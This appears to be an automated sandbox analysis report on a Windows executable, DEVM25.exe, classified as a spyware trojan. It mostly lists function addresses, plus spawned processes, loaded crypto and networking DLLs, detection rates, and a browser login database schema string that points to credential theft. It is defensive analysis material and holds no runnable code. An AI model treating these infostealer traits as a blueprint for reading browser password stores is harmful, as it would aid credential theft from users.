Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042D0A0	2_2_0042D0A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004318AB	2_2_004318AB
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040C8B0	2_2_0040C8B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040F148	2_2_0040F148
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00446170	2_2_00446170
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00433976	2_2_00433976
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00449100	2_2_00449100
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044C130	2_2_0044C130
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004469C0	2_2_004469C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004419CE	2_2_004419CE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004289F0	2_2_004289F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004439F0	2_2_004439F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043B1A6	2_2_0043B1A6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044C259	2_2_0044C259
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044C25B	2_2_0044C25B
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041B260	2_2_0041B260
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042D264	2_2_0042D264
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044A26D	2_2_0044A26D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041CA70	2_2_0041CA70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00420A7D	2_2_00420A7D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00432226	2_2_00432226
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004382E8	2_2_004382E8
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004382F6	2_2_004382F6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00427290	2_2_00427290
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043D2A0	2_2_0043D2A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044D2A0	2_2_0044D2A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043BB62	2_2_0043BB62
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040FB70	2_2_0040FB70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00408B10	2_2_00408B10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00430320	2_2_00430320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043AB3A	2_2_0043AB3A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00448BD0	2_2_00448BD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041E3E2	2_2_0041E3E2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042C390	2_2_0042C390
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00402BA0	2_2_00402BA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040A440	2_2_0040A440
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041D44B	2_2_0041D44B
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041F44C	2_2_0041F44C
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00445470	2_2_00445470
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00423CD0	2_2_00423CD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042348A	2_2_0042348A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004234A5	2_2_004234A5
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00438570	2_2_00438570
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044C510	2_2_0044C510
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00431DC2	2_2_00431DC2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004305C7	2_2_004305C7
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004035D0	2_2_004035D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042CDE0	2_2_0042CDE0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044D5F0	2_2_0044D5F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040AE40	2_2_0040AE40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040B660	2_2_0040B660
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00446E64	2_2_00446E64
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00409670	2_2_00409670
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00442E71	2_2_00442E71
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00446605	2_2_00446605
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00424600	2_2_00424600
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00407E10	2_2_00407E10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041061E	2_2_0041061E
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00426ECD	2_2_00426ECD
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004206D2	2_2_004206D2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040BB50	2_2_0040BB50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041E3E2	2_2_0041E3E2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041EF55	2_2_0041EF55
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043276D	2_2_0043276D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00403F70	2_2_00403F70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043CF70	2_2_0043CF70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00416F3C	2_2_00416F3C
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004027D0	2_2_004027D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044B7E7	2_2_0044B7E7
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00423FF0	2_2_00423FF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00443790	2_2_00443790
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0043EFA0	2_2_0043EFA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B698B0	2_2_00B698B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B398A0	2_2_00B398A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B578A0	2_2_00B578A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1C890	2_2_00B1C890
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B56090	2_2_00B56090
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2A0F0	2_2_00B2A0F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B690F0	2_2_00B690F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7B0F0	2_2_00B7B0F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B250E0	2_2_00B250E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B300E0	2_2_00B300E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B328C0	2_2_00B328C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1E030	2_2_00B1E030
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3E020	2_2_00B3E020
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2D810	2_2_00B2D810
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4A810	2_2_00B4A810
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B66010	2_2_00B66010
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B11000	2_2_00B11000
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B72800	2_2_00B72800
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4C870	2_2_00B4C870
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4D070	2_2_00B4D070
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2F860	2_2_00B2F860
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B23840	2_2_00B23840
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B201A0	2_2_00B201A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B289A0	2_2_00B289A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B18990	2_2_00B18990
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2F190	2_2_00B2F190
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1D1E0	2_2_00B1D1E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B141D0	2_2_00B141D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B741D0	2_2_00B741D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4E9C0	2_2_00B4E9C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B48130	2_2_00B48130
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B66920	2_2_00B66920
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B40110	2_2_00B40110
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B64110	2_2_00B64110
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2E900	2_2_00B2E900
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B48900	2_2_00B48900
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7D90A	2_2_00B7D90A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B47170	2_2_00B47170
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1B960	2_2_00B1B960
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B29150	2_2_00B29150
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B26940	2_2_00B26940
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B282B0	2_2_00B282B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B712B0	2_2_00B712B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B77AB0	2_2_00B77AB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B27AA0	2_2_00B27AA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B48AA0	2_2_00B48AA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B33A90	2_2_00B33A90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B35290	2_2_00B35290
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B422F0	2_2_00B422F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B822CA	2_2_00B822CA
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B88230	2_2_00B88230
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B73A20	2_2_00B73A20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B72210	2_2_00B72210
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B33200	2_2_00B33200
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B61A00	2_2_00B61A00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B58A70	2_2_00B58A70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B43A50	2_2_00B43A50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B17240	2_2_00B17240
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B67BB0	2_2_00B67BB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B21BA0	2_2_00B21BA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2E3A0	2_2_00B2E3A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B453A0	2_2_00B453A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B20B90	2_2_00B20B90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2DB80	2_2_00B2DB80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3ABF0	2_2_00B3ABF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4ABF0	2_2_00B4ABF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B793E0	2_2_00B793E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B593D0	2_2_00B593D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B37320	2_2_00B37320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B51320	2_2_00B51320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B18310	2_2_00B18310
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2B310	2_2_00B2B310
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1A300	2_2_00B1A300
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B17B00	2_2_00B17B00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B5130F	2_2_00B5130F
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B39360	2_2_00B39360
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B27B50	2_2_00B27B50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B5A350	2_2_00B5A350
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B60350	2_2_00B60350
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B5EB40	2_2_00B5EB40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B54CB0	2_2_00B54CB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B154D0	2_2_00B154D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B6BCC0	2_2_00B6BCC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B684C0	2_2_00B684C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B7A4C0	2_2_00B7A4C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B24430	2_2_00B24430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B20430	2_2_00B20430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B63430	2_2_00B63430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B24C10	2_2_00B24C10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2D410	2_2_00B2D410
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B43410	2_2_00B43410
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B32C00	2_2_00B32C00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B71C00	2_2_00B71C00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B2EC70	2_2_00B2EC70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B43C70	2_2_00B43C70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B56460	2_2_00B56460
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B22450	2_2_00B22450
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B35450	2_2_00B35450
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4C5A0	2_2_00B4C5A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B95592	2_2_00B95592
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B32D80	2_2_00B32D80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4DD80	2_2_00B4DD80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3B5F0	2_2_00B3B5F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B57DF0	2_2_00B57DF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B20DE0	2_2_00B20DE0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B18DD0	2_2_00B18DD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4F5D0	2_2_00B4F5D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B47DD0	2_2_00B47DD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4DDD9	2_2_00B4DDD9
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B355C0	2_2_00B355C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B19D30	2_2_00B19D30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B26530	2_2_00B26530
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B33530	2_2_00B33530
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4FD20	2_2_00B4FD20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B23510	2_2_00B23510
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B39D00	2_2_00B39D00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B6FD00	2_2_00B6FD00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B69500	2_2_00B69500
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4B560	2_2_00B4B560
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B73D60	2_2_00B73D60
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1CD50	2_2_00B1CD50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B116B0	2_2_00B116B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B35EB0	2_2_00B35EB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B53EA0	2_2_00B53EA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B19690	2_2_00B19690
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1E690	2_2_00B1E690
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B65690	2_2_00B65690
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B52E80	2_2_00B52E80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1B6F0	2_2_00B1B6F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B366F0	2_2_00B366F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4D6E0	2_2_00B4D6E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B486E0	2_2_00B486E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B5AEE0	2_2_00B5AEE0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B276C0	2_2_00B276C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B4AEC0	2_2_00B4AEC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B20620	2_2_00B20620
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3FE20	2_2_00B3FE20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1C610	2_2_00B1C610
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B30E10	2_2_00B30E10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B77E10	2_2_00B77E10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1DE60	2_2_00B1DE60
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B3E661	2_2_00B3E661
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B79E60	2_2_00B79E60
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B59650	2_2_00B59650
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B74640	2_2_00B74640
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B56F90	2_2_00B56F90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B6FF90	2_2_00B6FF90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B607F0	2_2_00B607F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B127E0	2_2_00B127E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B36FC0	2_2_00B36FC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B62FC0	2_2_00B62FC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B23F20	2_2_00B23F20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1BF10	2_2_00B1BF10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B93718	2_2_00B93718
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B32F10	2_2_00B32F10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B1A700	2_2_00B1A700
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B31F50	2_2_00B31F50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B29740	2_2_00B29740

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: String function: 0040B460 appears 56 times
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: String function: 0041B250 appears 82 times
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: String function: 00B7DE10 appears 95 times
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: String function: 00B8607C appears 44 times
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: String function: 00B8AE24 appears 34 times

Source: C:\Users\user\Desktop\DEVM25.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 404

Source: DEVM25.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DEVM25.exe	Static PE information: Section: .bss ZLIB complexity 1.0003218217329546
Source: DEVM25.exe	Static PE information: Section: .bss ZLIB complexity 1.0003218217329546

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/6@5/3

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 2_2_004447A0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_004447A0

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6640
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\fee7d9db-0362-4113-bf13-0d37a0244efe

Jump to behavior

Source: DEVM25.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DEVM25.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DEVM25.exe, 00000002.00000003.970672503.0000000003575000.00000004.00000800.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.990015207.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.989527605.0000000003573000.00000004.00000800.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.972945009.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DEVM25.exe	Virustotal: Detection: 73%
Source: DEVM25.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\DEVM25.exe

File read: C:\Users\user\Desktop\DEVM25.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DEVM25.exe "C:\Users\user\Desktop\DEVM25.exe"
Source: C:\Users\user\Desktop\DEVM25.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DEVM25.exe	Process created: C:\Users\user\Desktop\DEVM25.exe "C:\Users\user\Desktop\DEVM25.exe"
Source: C:\Users\user\Desktop\DEVM25.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 404
Source: C:\Users\user\Desktop\DEVM25.exe	Process created: C:\Users\user\Desktop\DEVM25.exe "C:\Users\user\Desktop\DEVM25.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DEVM25.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
